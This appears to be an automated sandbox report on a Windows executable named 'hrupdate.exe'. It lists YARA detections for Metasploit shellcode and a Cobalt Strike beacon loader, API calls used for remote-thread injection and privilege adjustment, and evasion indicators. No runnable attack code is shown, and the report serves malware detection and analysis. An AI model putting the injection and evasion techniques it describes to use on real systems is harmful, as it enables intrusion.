Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_046A2E65 CreateThread,CreateRemoteThread,GetCurrentProcess,NtCreateThreadEx,CreateThread,CreateRemoteThread,0_2_046A2E65
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_046A2824 VirtualAlloc,VirtualAllocEx,GetCurrentProcess,NtAllocateVirtualMemory,VirtualAlloc,VirtualAllocEx,0_2_046A2824
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_046A29D5 VirtualProtect,VirtualProtectEx,GetCurrentProcess,NtProtectVirtualMemory,VirtualProtect,VirtualProtectEx,0_2_046A29D5
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_04698D88 GetLastError,CreateProcessWithLogonW,GetLastError,_memset,GetLastError,0_2_04698D88
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_046BD4E0 0_2_046BD4E0
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_046B15A6 0_2_046B15A6
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_046BA9E8 0_2_046BA9E8
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_046ABBDA 0_2_046ABBDA
Source: hrupdate.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: dump.pcap, type: PCAP | Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: classification engineClassification label: mal96.troj.evad.winEXE@1/0@2/1
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046987F5 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_046987F5
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469B1AE CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32First,Thread32Next,Sleep,0_2_0469B1AE
Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SibcorUpdate0_2_00671480
Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SIBCORUPDATE0_2_00671480
Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: ,Dg0_2_00671480
Source: hrupdate.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\hrupdate.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: sspicli.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: textshaping.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: textinputframework.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: coremessaging.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ntmarta.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wintypes.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wininet.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: iertutil.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: profapi.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: winhttp.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: winnsi.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: urlmon.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: srvcli.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: netutils.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: schannel.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ntasn1.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: msasn1.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: dpapi.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: gpapi.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ncrypt.dll
Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ncryptsslp.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: hrupdate.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb source: hrupdate.exe
Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb%% source: hrupdate.exe
Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046BFCF7 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,FreeLibrary,0_2_046BFCF7
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F334F0 push cs; iretd 0_3_00F334F4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F338EC push cs; iretd 0_3_00F3392C
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F34AD6 push edi; retf 0_3_00F34AE4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F306D4 push cs; iretd 0_3_00F306E0
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F32AC5 push cs; iretd 0_3_00F32B0C
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F342CB push cs; iretd 0_3_00F342CC
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F34AB8 push cs; iretd 0_3_00F34AC4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F338AF push cs; iretd 0_3_00F338B0
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F32497 push cs; iretd 0_3_00F32498
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F31683 push cs; iretd 0_3_00F31684
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F32077 push cs; iretd 0_3_00F32078
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F33A75 push cs; iretd 0_3_00F33A7C
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F32053 push cs; iretd 0_3_00F32054
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F3123C push cs; iretd 0_3_00F312AC
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F33422 push cs; iretd 0_3_00F33428
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F32816 push ds; iretd 0_3_00F3281C
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F3161B push cs; iretd 0_3_00F3161C
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F3241F push cs; iretd 0_3_00F32438
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F34403 push cs; iretd 0_3_00F34404
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F307F3 push cs; iretd 0_3_00F307F4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F301F9 push ebp; ret 0_3_00F301FA
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F343DF push cs; iretd 0_3_00F343E4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F31DBE push cs; iretd 0_3_00F31DC8
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F34F77 push cs; iretd 0_3_00F34F78
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F35143 push cs; iretd 0_3_00F35144
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F33B29 push cs; iretd 0_3_00F33B30
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F30710 push cs; iretd 0_3_00F30714
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_006738D6 push ecx; ret 0_2_006738E9
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046AE7C0 push eax; ret 0_2_046AE7C7
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046B1BB1 push ecx; ret 0_2_046B1BC4
Source: C:\Users\user\Desktop\hrupdate.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04697BE70_2_04697BE7
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469CBF10_2_0469CBF1
Source: C:\Users\user\Desktop\hrupdate.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-19976
Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-17900
Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-17893
Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-18159
Source: C:\Users\user\Desktop\hrupdate.exe TID: 1076Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469F544 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_0469F544
